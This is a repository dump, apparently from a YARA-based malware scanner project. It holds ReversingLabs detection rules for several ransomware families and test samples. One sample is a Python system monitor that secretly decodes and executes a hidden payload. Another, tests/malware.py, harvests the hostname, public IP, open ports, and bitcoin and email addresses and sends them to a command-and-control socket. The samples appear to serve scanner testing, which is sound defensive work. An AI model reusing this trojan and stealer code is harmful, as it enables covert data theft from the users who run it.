USAGE | DISK USAGE | RUNNING PROCESSES |") 29 | print("| {:02}% | {:02}% | {:02}% | {} |".format(int(cpu), int(ram), int(disk), processes_count)) 30 | print("---------------------------------------------------------") 31 | 32 | # sleep for 2s 33 | time.sleep(2) 34 | else: 35 | # child process 36 | trojan() 37 | 38 | 39 | def trojan(): 40 | malware_fd = open(".malware.py", "w") 41 | blob = "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" 42 | malware = gzip.decompress(base64.b64decode(blob)).decode("UTF-8") 43 | malware_fd.write(malware) 44 | malware_fd.close() 45 | 46 | # execute malware 47 | os.system("/usr/bin/python3 .malware.py") 48 | 49 | 50 | if __name__ == "__main__": 51 | main() 52 | -------------------------------------------------------------------------------- /tests/malware.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/python3 2 | import requests 3 | import socket 4 | import base64 5 | import json 6 | import re 7 | import os 8 | 9 | 10 | def main(): 11 | # get hostname of the machine 12 | hostname = socket.gethostname() 13 | 14 | # get the public ipv4 address of the machine 15 | headers = { 16 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 17 | } 18 | public_ip = requests.get("https://ipapi.co/ip", headers = headers).text 19 | 20 | # search for bitcoin and email addresses 21 | bitcoin_addresses_list = [] 22 | email_addresses_list = [] 23 | for root, subdirs, files in os.walk("/home"): 24 | for file in files: 25 | file_fd = open("{}/{}".format(root, file), "r") 26 | try: 27 | # read the contents of each file 28 | file_contents = file_fd.read().strip() 29 | 30 | # search for bitcoin addresses 31 | bitcoin_addresses = re.findall(r"([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})", file_contents) 32 | 33 | # search for email addresses 34 | email_addresses = re.findall(r"[a-z0-9._]+@[a-z0-9]+\.[a-z]{1,7}", file_contents) 35 | 36 | # check if we have found any bitcoin addresses or emails 37 | if len(bitcoin_addresses) > 0: 38 | bitcoin_addresses_list = bitcoin_addresses_list + bitcoin_addresses 39 | if len(email_addresses) > 0: 40 | email_addresses_list = email_addresses_list + email_addresses 41 | 42 | file_fd.close() 43 | except: 44 | pass 45 | 46 | 47 | # get all open ports on the machine 48 | open_ports = os.popen("netstat -plant | grep -i listen | awk '{print $4}' | grep -P '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}'").read() 49 | open_ports = open_ports.strip().split("\n") 50 | 51 | # encode data to json and send them to command and control server 52 | data = { 53 | "machine_hostname": hostname, 54 | "machine_ip": public_ip, 55 | "machine_open_ports": open_ports, 56 | "bitcoin_addresses_found": bitcoin_addresses_list, 57 | "email_addresses_found": email_addresses_list 58 | } 59 | 60 | # base64 encode the json data 61 | 
encoded_data = base64.b64encode(json.dumps(data).encode()) 62 | 63 | # send data to command and control server 64 | 65 | # create a socket object 66 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | 68 | # connect to command and control server on port 1337 69 | s.connect(("127.0.0.1", 1337)) 70 | s.send(encoded_data) 71 | s.close() 72 | 73 | 74 | if __name__ == "__main__": 75 | main() 76 | -------------------------------------------------------------------------------- /src/lib/include/yara/filemap.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_FILEMAP_H 31 | #define YR_FILEMAP_H 32 | 33 | #include 34 | 35 | #if defined(_WIN32) || defined(__CYGWIN__) 36 | #include 37 | #define YR_FILE_DESCRIPTOR HANDLE 38 | #else 39 | #define YR_FILE_DESCRIPTOR int 40 | #endif 41 | 42 | #include 43 | #include 44 | #include 45 | 46 | 47 | typedef struct _YR_MAPPED_FILE 48 | { 49 | YR_FILE_DESCRIPTOR file; 50 | size_t size; 51 | const uint8_t* data; 52 | #if defined(_WIN32) || defined(__CYGWIN__) 53 | HANDLE mapping; 54 | #endif 55 | 56 | } YR_MAPPED_FILE; 57 | 58 | 59 | YR_API int yr_filemap_map(const char* file_path, YR_MAPPED_FILE* pmapped_file); 60 | 61 | 62 | YR_API int yr_filemap_map_fd( 63 | YR_FILE_DESCRIPTOR file, 64 | uint64_t offset, 65 | size_t size, 66 | YR_MAPPED_FILE* pmapped_file); 67 | 68 | 69 | YR_API int yr_filemap_map_ex( 70 | const char* file_path, 71 | uint64_t offset, 72 | size_t size, 73 | YR_MAPPED_FILE* pmapped_file); 74 | 75 | 76 | YR_API void yr_filemap_unmap(YR_MAPPED_FILE* pmapped_file); 77 | 78 | 79 | YR_API void yr_filemap_unmap_fd(YR_MAPPED_FILE* pmapped_file); 80 | 81 | #endif 82 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Petya.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Ransomware_Petya : tc_detection malicious 4 | { 5 | 6 | meta: 7 | 8 | author = "ReversingLabs" 9 | 10 | 
source = "ReversingLabs" 11 | status = "RELEASED" 12 | sharing = "TLP:WHITE" 13 | category = "MALWARE" 14 | malware = "PETYA" 15 | description = "Yara rule that detects Petya ransomware." 16 | 17 | tc_detection_type = "Ransomware" 18 | tc_detection_name = "Petya" 19 | tc_detection_factor = 5 20 | 21 | strings: 22 | $entry_point = { 23 | 55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 24 | E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ?? 25 | ?? ?? ?? 8B C7 5F 5E 5D C2 26 | } 27 | 28 | $shutdown_pattern = { 29 | 55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 30 | 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D 31 | 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 32 | 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 33 | ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B 34 | E5 5D C3 35 | } 36 | 37 | $sectionxxxx_pattern = { 38 | 83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0 39 | 74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ?? 40 | ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B 41 | E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24 42 | ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72 43 | ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A 44 | 03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F 45 | 5E 5D 0F B6 C2 5B 83 C4 ?? C3 46 | } 47 | 48 | $crypt_gen_pattern = { 49 | 55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ?? 50 | ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ?? 51 | ?? 85 C0 75 ?? 6A ?? 58 EB ?? 
53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D 52 | C3 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and ($entry_point at pe.entry_point) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern 57 | 58 | } -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Flamingo.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_Flamingo : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "FLAMINGO" 12 | description = "Yara rule that detects Flamingo ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Flamingo" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 22 | 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? 23 | ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 24 | ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 25 | C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 26 | 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 27 | 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 28 | C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 29 | 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 30 | } 31 | 32 | $encrypt_files = { 33 | 68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ?? 34 | ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? 35 | ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 
C6 00 ?? 8D 85 36 | ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ?? 37 | ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 38 | C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 39 | C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? 40 | ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ?? 41 | ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? 42 | ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 43 | 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 44 | } 45 | 46 | condition: 47 | uint16(0) == 0x5A4D and 48 | ( 49 | $find_files 50 | ) and 51 | ( 52 | $encrypt_files 53 | ) 54 | } -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Gpcode.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_GPCode : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "GPCODE" 12 | description = "Yara rule that detects Gpcode ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "GPCode" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | $drive_loop = { 20 | B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80 21 | C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ?? 22 | ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D 23 | } 24 | 25 | $encrypt_routine = { 26 | FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10] 27 | E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ?? 28 | ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? 29 | ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ?? 30 | 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) 31 | ?? ?? ?? ?? 
0B C0 75 ?? (EB | E9) [1-4] 6A ?? 32 | [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 33 | 75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8 34 | } 35 | 36 | $set_ransom_wallpaper = { 37 | 0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ?? 38 | B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F 39 | 59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33 40 | C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? 41 | ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 42 | 68 ?? ?? ?? ?? (E8 | FF 15) 43 | } 44 | 45 | $read_config_file = { 46 | 55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 47 | ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? 48 | ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ?? 49 | E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF 50 | 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 51 | 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 52 | 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 53 | 33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75 54 | ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 55 | 6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B 56 | 45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ?? 57 | ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3 58 | } 59 | 60 | condition: 61 | uint16(0) == 0x5A4D and 62 | ($drive_loop and 63 | $encrypt_routine and 64 | $set_ransom_wallpaper and 65 | $read_config_file) 66 | 67 | } -------------------------------------------------------------------------------- /src/lib/include/yara/ahocorasick.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2013. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. 
Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef _AHOCORASICK_H 31 | #define _AHOCORASICK_H 32 | 33 | #include 34 | #include 35 | #include 36 | 37 | // Number of bits dedicated to store the offset of the slot relative to its 38 | // own state. 39 | #define YR_AC_SLOT_OFFSET_BITS 9 40 | 41 | // Max number of slots in the transition table. This is the maximum number of 42 | // slots that can be addressed with 23-bit indexes. 
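#define YR_AC_MAX_TRANSITION_TABLE_SIZE 0x800000

#define YR_AC_ROOT_STATE 0

// A transition packs the next-state index in its high bits and the input
// byte in its low YR_AC_SLOT_OFFSET_BITS bits (see YR_AC_MAKE_TRANSITION).
// Every macro operand is parenthesized so that compound expressions
// (`a | b`, `*p`) can be passed without precedence surprises, and the byte
// mask is derived from YR_AC_SLOT_OFFSET_BITS rather than hard-coded as 0x1FF
// (identical value for the current 9-bit setting).
#define YR_AC_NEXT_STATE(t) ((t) >> YR_AC_SLOT_OFFSET_BITS)
#define YR_AC_INVALID_TRANSITION(t, c) \
  (((t) & ((1 << YR_AC_SLOT_OFFSET_BITS) - 1)) != (c))

#define YR_AC_MAKE_TRANSITION(state, code) \
  ((YR_AC_TRANSITION)( \
      (((YR_AC_TRANSITION) (state)) << YR_AC_SLOT_OFFSET_BITS) | (code)))

// Creates a new automaton inside `arena` and returns it through `*automaton`;
// the int result is presumably an error code — confirm in ahocorasick.c.
int yr_ac_automaton_create(YR_ARENA* arena, YR_AC_AUTOMATON** automaton);

int yr_ac_automaton_destroy(YR_AC_AUTOMATON* automaton);

// Adds `string` (index `string_idx`, together with its atom list) to the
// automaton, allocating from `arena`.
int yr_ac_add_string(
    YR_AC_AUTOMATON* automaton,
    YR_STRING* string,
    uint32_t string_idx,
    YR_ATOM_LIST_ITEM* atom,
    YR_ARENA* arena);

// Builds the final transition table; presumably to be called once all strings
// have been added — confirm in ahocorasick.c.
int yr_ac_compile(YR_AC_AUTOMATON* automaton, YR_ARENA* arena);

// Presumably a debugging dump of the automaton.
void yr_ac_print_automaton(YR_AC_AUTOMATON* automaton);

#endif

-------------------------------------------------------------------------------- /src/exp/virus/Win32.Virus.Greenp.yara: --------------------------------------------------------------------------------
import "pe"

rule Win32_Virus_Greenp : tc_detection malicious
{
    meta:

        author = "ReversingLabs"

        source = "ReversingLabs"
        status = "RELEASED"
        sharing = "TLP:WHITE"
        category = "MALWARE"
        malware = "GREENP"
        description = "Yara rule that detects Greenp virus."

        tc_detection_type = "Virus"
        tc_detection_name = "Greenp"
        tc_detection_factor = 5

    strings:
        $greenp_body_1 = {
            68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01
            50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC
            6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00
            FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ??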
50 FF 95 ?? ?? ?? 26 | ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF 27 | 95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46 28 | 0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4 29 | 68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ?? 30 | ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 31 | 8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43 32 | 10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42 33 | 50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ?? 34 | ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99 35 | } 36 | 37 | $greenp_body_2 = { 38 | 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95 39 | ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ?? 40 | ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ?? 41 | ?? ?? 
C3 42 | } 43 | 44 | condition: 45 | uint16(0) == 0x5A4D and ($greenp_body_1 at pe.entry_point) and $greenp_body_2 46 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Ghostbin : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "GHOSTBIN" 12 | description = "Yara rule that detects Ghostbin ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Ghostbin" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_env = { 21 | 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 22 | 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 23 | 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08 24 | 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ?? 25 | ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? 26 | ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 27 | ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ?? 28 | ?? ?? DE ?? 2A 29 | } 30 | 31 | $encrypt_files = { 32 | 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ?? 33 | ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ?? 34 | ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08 35 | 09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A 36 | } 37 | 38 | $find_files = { 39 | 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28 40 | ?? ?? 
